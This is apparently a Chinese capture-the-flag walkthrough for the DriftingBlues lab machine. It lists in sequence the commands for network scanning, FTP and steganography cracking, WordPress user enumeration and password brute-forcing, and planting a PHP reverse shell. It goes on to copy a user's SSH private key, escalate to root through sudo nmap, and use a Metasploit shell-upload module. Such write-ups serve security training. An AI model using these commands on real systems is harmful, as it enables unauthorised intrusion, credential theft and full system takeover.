一:主机发现
arp-scan -I eth0 10.9.23.0/24
二:端口扫描
nmap -T4 -sV -p- -A 10.9.23.50
三:端口探测
1:ftp
ftp可以实现匿名登录
anonymous
get secret.jpg
得到 一张图片
先用steghide查看隐藏信息
steghide extract -sf secret.jpg
需要密码所以尝试利用stegseek爆破
stegseek --crack secret.jpg /root/rockyou.txt -xf output.txt
并不能爆破出密码
2:80端口
发现一堆图片
1:进行目录探测
dirb http://10.9.23.50
2:添加域名到host文件中
3:用wpscan探测他的用户名,发现一个albert用户名
wpscan --url http://driftingblues.box/blog -e u
4:爆破一下,成功拿到密码
wpscan --url http://driftingblues.box/blog -U user.txt -P /usr/share/wordlists/rockyou.txt
scotland1
5:成功登入。在后台将index.php文件中插入php-reverse-shell
6:nc开启监听
nc -lvvp 6666
http://10.9.23.50/blog/index.php/52125
随便访问一个不存在的网址,触发shell
2.用python3回弹交互式shell后,在freddie用户下,发现.ssh文件
python3 -c 'import pty;pty.spawn("/bin/bash")'
wget 10.9.23.112/passwd
cp passwd.1 /etc/passwd
权限不允许,试试其他方法
在Home目录下发现ssh文件,可能是私钥,来实现免密登录ssh
cat /home/freddie/.ssh/id_rsa
python2 -m SimpleHTTPServer 9998
wget http://10.9.23.50;9998//home/freddie/.ssh/id_rsa
wget http://10.9.23.50:9998/id_rsa
nano id_rsa
编辑
chmod 400 id_rsa
登录ssh
ssh freddie@10.9.23.50 -i id_rsa
在得到shell之后查看普通用户发现有一个freddie用户
在路径 /home/freddie/.ssh 下发现 id_rsa 文件,将其保存到本地,使用rsd进行登入
使用 rsa 登录ssh原理:
密钥形式登录的原理是:利用密钥生成器制作一对密钥:一只公钥和一只私钥。将公钥添加到服务器的某个账户上,然后在客户端利用私钥即可完成认证并登录。这样一来,没有私钥,任何人都无法通过 SSH 暴力破解你的密码来远程登录到系统。此外,如果将公钥复制到其他账户甚至主机,利用私钥也可以登录。
得到第一个flag
四:提权
sudo -l 之后直接发现可以使用nmap提权
原理(需要注意这里第一种无回显的提权方式测试成功,在输入指令时可以提前写好复制上去,防止输错):
如果允许二进制文件以超级用户身份运行,则它不会删除提升的权限,并可用于访问文件系统、升级或维护特权访问。(sudo)
输入回显被禁用。
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
交互模式在版本 2.02 至 5.21 上可用,可用于执行 shell 命令。
sudo nmap --interactive
nmap> !sh
这时看不到东西
使用 python 切换 bash:
python3 -c 'import pty; pty.spawn("/bin/bash")'
得到第二个flag
第二种方式
利用msfconsole得到shell
msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
show options
set username albert
set password scotland1
set rhost 10.9.23.50
set TARGETURI /blog
run
使用shell -t进入Linux shell
扫一扫
931
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
